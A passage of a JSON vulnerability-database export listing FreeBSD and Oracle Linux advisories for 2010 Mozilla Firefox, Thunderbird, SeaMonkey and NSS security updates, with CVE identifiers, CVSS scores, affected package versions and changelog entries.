"\nThe Mozilla Project reports:\n\nMFSA 2010-64 Miscellaneous memory safety hazards (rv:1.9.2.11/ 1.9.1.14)\nMFSA 2010-65 Buffer overflow and memory corruption using document.write\nMFSA 2010-66 Use-after-free error in nsBarProp\nMFSA 2010-67 Dangling pointer vulnerability in LookupGetterOrSetter\nMFSA 2010-68 XSS in gopher parser when parsing hrefs\nMFSA 2010-69 Cross-site information disclosure via modal calls\nMFSA 2010-70 SSL wildcard certificate matching IP addresses\nMFSA 2010-71 Unsafe library loading vulnerabilities\nMFSA 2010-72 Insecure Diffie-Hellman key exchange\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2010-10-19T00:00:00", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3181", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-19T00:00:00", "id": "C4F067B9-DC4A-11DF-8E32-000F20797EDE", "href": "https://vuxml.freebsd.org/freebsd/c4f067b9-dc4a-11df-8e32-000f20797ede.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:15:18", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-73.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.12,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-thunderbird", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.12,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.9.2.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxul", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.5.15", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox-devel", "operator": "lt"}], "description": "\nThe Mozilla Project reports:\n\nMFSA 2010-73 Heap buffer overflow mixing document.write and DOM insertion\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2010-10-27T00:00:00", "title": "mozilla -- Heap buffer overflow mixing document.write and DOM insertion", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-27T00:00:00", "id": "C223B00D-E272-11DF-8E32-000F20797EDE", "href": "https://vuxml.freebsd.org/freebsd/c223b00d-e272-11df-8e32-000f20797ede.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:42:16", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "x86_64", "packageFilename": "nss-3.12.8-1.0.1.el4.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-tools-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "ia64", "packageFilename": "nss-devel-3.12.8-1.0.1.el4.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "ia64", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.ia64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-tools-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "ia64", "packageFilename": "firefox-3.6.11-2.0.1.el4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-tools-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "i386", "packageFilename": "firefox-3.6.11-2.0.1.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "i386", "packageFilename": "firefox-3.6.11-2.0.1.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "x86_64", "packageFilename": "nss-tools-3.12.8-1.0.1.el4.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "x86_64", "packageFilename": "firefox-3.6.11-2.0.1.el4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "ia64", "packageFilename": "nss-tools-3.12.8-1.0.1.el4.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "i386", "packageFilename": "firefox-3.6.11-2.0.1.el4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "ia64", "packageFilename": "nss-3.12.8-1.0.1.el4.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "ia64", "packageFilename": "firefox-3.6.11-2.0.1.el5.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "ia64", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.ia64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-tools-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "x86_64", "packageFilename": "firefox-3.6.11-2.0.1.el5.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "x86_64", "packageFilename": "nss-devel-3.12.8-1.0.1.el4.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}], "description": "firefox:\n[3.6.11-2.0.1.el5]\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\n and remove the corresponding Red Hat ones\n[3.6.11-2]\n- Update to 3.6.11 Build 2\n[3.6.11-1]\n- Update to 3.6.11\nnss:\n[3.12.8-1.0.1.el5]\n- Update clean.gif in the nss-3.12.8-stripped.tar.bz2 tarball\n[3.12.8-1]\n- Update to 3.12.8\nxulrunner:\n[1.9.2.11-2.0.1.el5]\n- Added xulrunner-oracle-default-prefs.js and removed the corresponding\n RedHat one.\n[1.9.2.11-2]\n- Update to 1.9.2.11 Build 2\n[1.9.2.11-1]\n- Update to 1.9.2.11", "edition": 3, "reporter": "Oracle", "published": "2010-10-20T00:00:00", "title": "firefox security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-20T00:00:00", "id": "ELSA-2010-0782", "href": "http://linux.oracle.com/errata/ELSA-2010-0782.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:25", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}], "description": "[1.0.9-64.0.1.el4]\n- Added mozilla-oracle-default-prefs.js and mozilla-oracle-default-bookmarks.html\n and emoved corresponding RedHat ones\n[1.0.9-64.el4]\n- Added fixes from 1.9.1.14", "edition": 3, "reporter": "Oracle", "published": "2010-10-20T00:00:00", "title": "seamonkey security update", "type": "oraclelinux", 